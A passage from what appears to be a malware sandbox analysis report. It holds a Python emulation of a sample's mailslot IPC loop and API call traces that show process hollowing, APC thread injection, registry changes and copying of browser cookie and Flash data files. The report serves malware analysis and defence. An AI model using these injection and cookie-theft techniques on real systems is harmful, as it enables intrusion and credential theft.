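        self.queue = deque()
        self.write_timeouts = write_timeouts  # constructed fault injection: fail this many writes

    def write(self, chunk):
        if len(chunk) > self.max_msg:
            raise ValueError("message exceeds nMaxMessageSize")
        if self.write_timeouts:
            self.write_timeouts -= 1
            raise MailslotTimeout
        self.queue.append(bytes(chunk))

    def read(self):
        if not self.queue:
            raise MailslotTimeout
        return self.queue.popleft()


def send(slot, payload, max_retries=8):
    """Mirror of E004010FB's WriteFile loop. Returns (error_code, list of message sizes)."""
    sizes = []
    off, remaining, retries = 0, len(payload), 0
    while remaining:
        n = min(remaining, MAILSLOT_MAX_MSG)      # _v16 = min(_t46, 0x1000)
        try:
            slot.write(payload[off:off + n])
        except MailslotTimeout:
            retries += 1                          # sample: Sleep(0x64), resend the same chunk
            if retries > max_retries:             # cap added for the example
                return ERROR_SEM_TIMEOUT, sizes
            continue
        sizes.append(n)
        off += n                                  # _v8 += _t43
        remaining -= n                            # _t46 -= _t43
        if remaining == 0 and n == MAILSLOT_MAX_MSG:
            # Last message was a full 0x1000 bytes: resend the final byte as a 1-byte
            # message so the receiver's "short message ends the transfer" test fires.
            remaining = 1
            off -= 1
    return 0, sizes


def recv(slot, max_polls=8):
    """Mirror of E00401033's ReadFile loop. Returns (error_code, received bytes)."""
    buf = bytearray()
    polls = 0
    while True:
        try:
            msg = slot.read()
        except MailslotTimeout:
            polls += 1                            # sample: _v16 = 0x1000, Sleep(0x64), loop
            if polls > max_polls:                 # cap added for the example
                return ERROR_SEM_TIMEOUT, bytes(buf)
            continue
        buf += msg                                # HeapReAlloc(+0x1000), _t39 += bytes read
        if len(msg) != MAILSLOT_MAX_MSG:          # while (_v16 == 0x1000)
            return 0, bytes(buf)


def roundtrip(payload, write_timeouts=0):
    """Send payload through a fresh slot and read it back: (message sizes, received bytes)."""
    slot = FakeMailslot(write_timeouts=write_timeouts)
    err, sizes = send(slot, payload)
    if err:
        raise RuntimeError(f"send failed: {err:#x}")
    err, data = recv(slot)
    if err:
        raise RuntimeError(f"recv failed: {err:#x}")
    return sizes, data


if __name__ == "__main__":
    for n in (5, 0x1000, 0x1001, 0x2000):
        payload = (bytes(range(256)) * (n // 256 + 1))[:n]   # constructed sample payload
        sizes, data = roundtrip(payload)
        print(f"len={n:#x} messages={sizes} received={len(data):#x} exact={data == payload}")
```

Running it shows the property worth remembering when reassembling or replaying this channel: a payload whose length is a multiple of 0x1000 arrives with its last byte repeated (0x2000 bytes in, 0x2001 out), because the 1-byte terminator is a re-send of real data, not a separate control message. Any emulated receiver or IPC monitor built for this sample has to expect that extra byte, and must keep polling on ERROR_SEM_TIMEOUT rather than treating it as end of stream.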
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
